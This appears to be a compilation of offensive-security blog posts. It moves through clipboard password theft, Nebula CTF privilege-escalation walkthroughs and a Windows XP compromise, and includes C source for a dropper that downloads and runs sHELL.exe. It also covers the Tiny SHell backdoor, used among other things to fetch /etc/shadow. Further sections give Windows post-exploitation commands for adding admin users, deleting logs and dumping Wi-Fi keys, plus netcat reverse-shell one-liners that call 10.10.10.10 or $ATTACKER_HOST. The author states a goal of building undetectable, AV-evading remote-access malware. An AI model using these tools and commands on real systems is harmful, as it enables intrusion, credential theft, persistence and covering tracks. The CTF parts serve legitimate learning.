Stealing Secrets (like Passwords) from Windows 10 with a vanilla shell

Today’s post was going to be about reverse shells with .vcf, what I had in mind (lolbin shells) did not work based on filtering/search but I will try some work arounds, in the meantime check this nice post out with a variant on exploiting with .vcf with msfvenom payload…Exploiting Windows PC using Malicious Contact VCF file
A huge shoutout to cyber security researcher John Page for bringing this vulnerability into the internet’s eye on 15th…www.hackingarticles.in

Since what I had in mind did not work (was fun lab testing at least), today’s post is short and sweet…

So, you got that vanilla web shell…Day 24: Windows Post Exploitation Shells and File Transfer with Netcat for Windows
The Problemmedium.com

Now what? Steal all the passwords and secrets on the clipboard, just one of many things you can do…

powershell.exe Get-Clipboard

That’s it, literally! Put this in a nice loop, along with screenshots of Desktop and you will be left with a lot of juicy login creds, guaranteed!

Mac Clipboard Dump

pbpaste

Linux

As far as I know, all solutions are third part installs, way I usually dump this is from memory. Anyone have native command line ways to dump any Linux os clipboard?

Symlink for the Win!

Challenge Intro:

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Let’s look at the source code…

Ok, so our file argument need to NOT contain token but we want to read token…

First thought is Symlink…let’s try…

Quick win, nice and easy 🙂

ln -s /home/flag04/token newfile
/home/flag04/flag04 newfile
Abusing Cron for Privilege Escalation (Nebula Level03)

Abusing Cron

The challenge provides a hint:

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

These types of issues are common in easy CTFs, CTF VMs and more. The issue is generally when a command running as another use can be abused in some way, in linux most common ones that can be abused are wildcards * and directory trees. Today we will focus on a wildcard command that will enable us to do whatever we need to as the user, in this case flag03 because this cronjob runs as that user.

Solution #1

In our bash script we will use “chmod +s” as that sets user or group ID on execution, exactly what we want to spawn shell as user flag03.

First let’s create our exploit, we first need to know the user we want to mimic, since it’s a CTF VM we know it’s flag03, so we can run the following command:

level03@nebula:/home/flag03$ cat /etc/passwd | grep "flag03"
flag03:x:996:996::/home/flag03:/bin/sh

Ok, so id 996, then the shell.c file should look like this…

shell.c

Now let’s create the ‘glue’ the script that will run as flag03, copy our shell, SetUID/GID and make it executable…

pwn.sh

Commands are run as follows:

nano /tmp/shell.c
cd /home/flag03/writeable.d/
nano pwn.sh
chmod +x pwn.sh

I have some great cron priv. esc. examples in the archives from old jobs/ctfs, when I get a change I will update this post on all things cron based priv. esc.

Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

To follow along, get the Nebula VM from Exploit Education…Exploit Education :: Andrew Griffiths’ Exploit Education
exploit.education provides a variety of resources that can be used to learn about vulnerability analysis, exploit…exploit.education

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.

Of course “/bin/…/flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!

Search for SUID/GUID binaries

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Nebula Level00
Recorded by int0x33asciinema.org

Level 01 (Environment Variable Injection — PATH)

Challenge source is provided, can we spot the vulnerability?

We know we can alter environment variables and that the program will do the following:

setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.

With the source code, and access to the server, it’s easy to spot the issue:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Nebula – Level01
Recorded by int0x33asciinema.org

Level 02 (Environment Variable Injection — USER)

We get the source again for this..

This one is easy, we can just inject a command into the USER environment variable.

cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag

The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.Nebula – level 02
Recorded by int0x33asciinema.org

Part 1 — Billy Gates (Writing Remote Admin Apps for Windows in C)

Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤

Dropper.c

I have had this code for years, served me well and was originally taken from a book called Advanced Persistent Threat Hacking which was quit good from what I remember.

What it does…

Housekeeping, like imports and definitions…

#define PTL "https"
#define DMN "10.10.10.10"
#define FLE "sHELL.exe"
#define CURL_STATICLIB
#include <stdio.h>
#include <curl/curl.h>

#include <file>

This variant is used for system header files. It searches for a file named file in a standard list of system directories.

#include "file"

This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.

Callback Function

We need to give curl a callback function, this is standard and defined in example docs like this: https://curl.haxx.se/libcurl/c/getinmemory.html

Ours is simple, sets up some variable then writes buffer to file…

size_t write_callback(void *buffer, size_t size, size_t nitems, void *userp){
FILE *file = (FILE*)userp;
size_t write;
write = fwrite(buffer, size, nitems, file);
return write;
}

Main

Here we first set up some variable again, then we concat some variables like PTL (protocol), DMN (domain) and FLE (file) to make the url we will request (https://10.10.10.10/sHELL.exe).

Then we use curl to get the file and save it with our callback, then we clean up like closing file handler and then we execute the file that was downloaded.

int main(void)
{
CURL *curl;
CURLcode res;
FILE *outFile;
outFile=fopen(FLE, "wb");
char finalURL[512];
memset(finalURL, sizeof(finalURL), '\0');
strcat( finalURL, PTL);
strcat( finalURL, "://");
strcat( finalURL, DMN);
strcat( finalURL, "/");
strcat( finalURL, FLE);
curl = curl_easy_init();

if(curl){
curl_easy_setopt(curl, CURLOPT_URL, finalURL);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, outFile);
res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
fclose(outFile);
}
WinExec( FLE, 0 );
return 0;
}

This code is basic and could be improved a lot, some parts are also quite dated and super easy to detect so we will work on improving these parts in future BillyGates posts. Over time we will develop BillyGates into an effective undetectable remote admin app for Windows.int0x33/BillyGates
Billy Gates is an admin app for Windows xD. Contribute to int0x33/BillyGates development by creating an account on…github.com

Tiny SHell (SSH-like backdoor with full-pty terminal)

Note: Why am I posting this? Because today I forked it and will add features plus allow recursive file transfer, also some sneaky evasion stuff too. So I am posting this to give you all a background to the tool and also so you can star it on Github for updates if you want to get early releases.

Tsh is a small ssh-like backdoor with full-pty terminal and with capability of file transfer. This tool has very small footprint and is easily built on most unix-like systems.int0x33/tsh
Tiny SHell – An open-source UNIX backdoor. Contribute to int0x33/tsh development by creating an account on GitHub.github.com

Before compiling Tiny SHell

  • First of all, you should setup your secret key, which is located in tsh.h; the key can be of any length (use at least 12 characters for better security).
  • It is advised to change SERVER_PORT, the port on which the server will be listening for incoming connections.
  • You may want to start tshd in “connect-back” mode if it runs on on a firewalled box; simply uncomment and modify CONNECT_BACK_HOST in tsh.h.

Compiling Tiny SHell

Run “make <system>”, where <system> can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

How to use the server

It can be useful to set $HOME and the file creation mask before starting the server:

% umask 077; HOME=/var/tmp ./tshd 

How to use the client

Make sure tshd is running on the remote host.

Start a shell:

./tsh <hostname>

Execute a command:

./tsh <hostname> “uname -a” 

Transfer files:

./tsh <hostname> get /etc/shadow 
./tsh <hostname> put vmlinuz /boot

Multiple file transfers

At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it.

./tsh host “stty raw; tar -cf — /etc 2>/dev/null” | tar -xvf 

On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:

% stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"

Security

Please remember that the secret key is stored in clear inside both tsh and tshd executables; therefore you should make sure that no one except you has read access to these two files. However, you may choose not to store the real (valid) key in the client, which will then ask for a password when it starts.

The Complete List of Windows Post-Exploitation Commands (No Powershell)
  • I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤

Current User

whoami /all

On older machines, whoami might not be available so to find out the current user try the following:

echo %username%

All Users

net user

Add User

net user hacker hack3d /add

Make User Admin

net localgroup administrators hacker/add

Remove User

net user hacker /del

Files

type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

Files to Pull

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

Host Information

systeminfo
driverquery
tasklist
fsutil fsinfo drives
set
qwinsta
net time
net file
net session
net use

If you are looking for kernal exploit targets, you can try using findstr like so…

driverquery | findstr Kernel

Services

sc queryex type= service state= all
netstat -ano

Query a specific service:

sc query <SERVICE NAME>

Start a service:

sc start <SERVICE NAME>

Stop a service:

sc stop <SERVICE NAME>

Kill a Task

taskkill f /pid 1337

List System Logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

Find AP SSID

netsh wlan show profile

Get Cleartext Pass

netsh wlan show profile <SSID> key=clear
Hacking like it’s 1999 (No Metasploit — Windows XP)

Enum & PWN

nmap -sC -sV -oN nmap <TARGET>

Turns out we can write to the webroot, what do we do next?

ftp> put nc.exe
ftp> put callhome.asp

callhome.asp

objshell.Run(“C:\www\nc.exe 10.10.10.10 6000 -e cmd”)

The line above will use the netcat we uploaded via ftp and will use it to call home. Just visit https://vulnerable.net/callhome.asp.

We Now Haz Shell

Now what? The Classics…

FuzzySecurity | Windows Privilege Escalation Fundamentals
Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are…www.fuzzysecurity.com

In this case, by reconfiguring the service we can let it run any binary of our choosing with SYSTEM level privileges.

In this case, I configure it to just call home again so I could manually enable RDP and create an admin user.

sc config upnphost binpath= “C:\www\nc.exe 10.10.10.10 6000 -e C:\WINDOWS\System32\cmd.exe”
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

Enable RDP and Add User

net users hacker hacked /add
net localgroup administrators hacker /add
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Profit and Win like it’s 1999

rdesktop -u hacker -p hacked <TARGET> -g 90%
Windows Post Exploitation Shells and File Transfer with Netcat for Windows

The Problem

We know the situation all to well, we have remote code execution and can upload and/or write files through a temperamental connection but want something a little more robust, something like netcat that always comes in so damn handy when pwing Unix systems.

The Solution — Netcat for Windows

Get the 32bit version here:int0x33/nc.exe
Netcat for windows 32/64 bit. Contribute to int0x33/nc.exe development by creating an account on GitHub.github.com

And the 64bit version here:int0x33/nc.exe
Netcat for windows 32/64 bit. Contribute to int0x33/nc.exe development by creating an account on GitHub.github.com

Uploading Files

A good tip that often comes in handy is to base64 encode a file, then simply copy the base64 blob to a file via a vuln or RCE and either decode first or after depending on your RCE situation. If you try and copy a file as-is in many situations the troublesome contents like language operators or null bytes etc will break the connection, application or worse, crash the target host.

Reverse Powershell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell

Example RCE on web app:

https://vulnerable.com?pageId=nc64.exe 10.10.10.10 1337 -e powershell

Of course in the wild, we would url encode it:

https://vulnerable.com?pageId=nc64.exe%2010.10.10.10%201337%20-e%20powershell

Bind Powershell

#32bit
nc.exe -l -p $LISTENPORT -e powershell
#64bit
nc64.exe -l -p $LISTENPORT -e powershell

Reverse Shell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd

Bind Shell

#32bit
nc.exe -l -p $LISTENPORT -e cmd
#64bit
nc64.exe -l -p $LISTENPORT -e cmd

Transfer File

Sender (Unix)

nc $TARGET $PORT < $FILE

Receiver (Windows)

#32bit
nc.exe -l -p $LISTENPORT > $FILE
#64bit
nc64.exe -l -p $LISTENPORT > $FILE
Common SCADA Attacks

Network Attacks

  • Service & Application Vulnerabilities
  • Brute-force Attacks (Logins and Hashes)
  • Pass-the-hash
  • Sniffing cleartext password exchanges
  • MITM
  • Denial of Service incl. Distributed Attacks
  • Packet Injection
  • Route Spoofing
  • DNS Poisoning
  • Session Hijacking
  • VLAN hopping
  • Spanning Tree Attacks
  • VLAN Trunking Attacks

Web Attacks

  • Source code modification
  • Plugin & Extension Attacks
  • Remote and Local File Inclusion
  • XSS
  • SQLi
  • CSRF
  • Browser Attacks

Workstations and Servers

  • Device driver attacks
  • Cold Boot Attacks
  • Password & hash extraction/cracking
  • Sinkhole Attacks

Binary and Application Attacks

  • Buffer & Stack Overflows
  • Format String Exploits
  • Input Validation Attacks
  • Use-After-Free
  • Integer Overflow/Underflow
  • Dangling Pointer Attacks
  • Off by one attacks
  • Ret 2 attacks

User Attacks

  • Spear Phishing & Phishing
  • Social Engineering

We will be digging into a lot of these topics over the coming weeks so if you are unfamiliar with a few of them don’t worry, try googling in the mean time. My favourites are binary/application and network attacks. To learn more about the basics of these kinds of attacks on SCADA systems, I recommend the following book to get you started:Hacking Exposed Industrial Control Systems: ICS and SCADA Security Secrets & Solutions
Publisher’s Note: Products purchased from Third Party sellers are not guaranteed by the publisher for quality…www.amazon.com